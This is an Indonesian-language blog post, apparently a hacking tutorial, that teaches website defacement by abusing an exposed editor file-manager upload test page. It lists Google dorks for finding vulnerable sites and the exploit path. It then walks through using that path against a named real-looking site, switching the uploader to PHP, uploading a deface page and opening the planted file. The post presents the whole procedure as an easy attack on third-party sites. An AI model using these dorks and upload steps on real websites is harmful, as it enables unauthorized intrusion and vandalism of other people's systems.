» » Tutorial Deface Dengan Metode Remote File Uploaded
Edit

Tutorial Deface Dengan Metode Remote File Uploaded

Bahan-Bahan


Quote:-Kopi
-Obat Nyamuk
-Lilin
-Roko

Dork
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

Exploit:
/editor/editor/filemanager/upload/test.h­tml

Langsung Masukkan Dork Ke dalam Kotak Search Goggle
[Image: g7w0d6V.png]

Setelah Itu Pilih Salah satu web dari Ratusan web Di dalam Dork.
Sebagai contoh Web target saya adalah
http://www.buraevo.ru/fronteiranorte/editor/editor/filemanager/upload/
Masukan Exploit Sehingga menjadi
http://www.buraevo.ru/editor/editor/filemanager/upload/test.html
Ganti Mode ASP Dengan PHP di bawah Tulisan Select the "File Uploader" to use:
Lihat Gambar
[Image: 7ZqyvOK.png]


Klick Browse Dan Masukan Script Deface Ente
[Image: aLLfnV9.png]

Langsung Klik Send It To The Server

Jika Ada Tulisan File Upload with no Eror(Kurang lebihCapede) Itu berarti FIle Deface kamu sudah masuk ke dalam Web tersebut
[Image: P1IceTR.png]

Dan Saya mendapatkan Exploit ini /UserFiles/AttituteAttack.html
Ubah Lagi Exploitnya Menjadi http://www.buraevo.ru/UserFiles/AttituteAttack.html

~Selesai! Mudah Bukan?!~

0 Response to "Tutorial Deface Dengan Metode Remote File Uploaded"

Post a Comment

Subscribe to: Post Comments (Atom)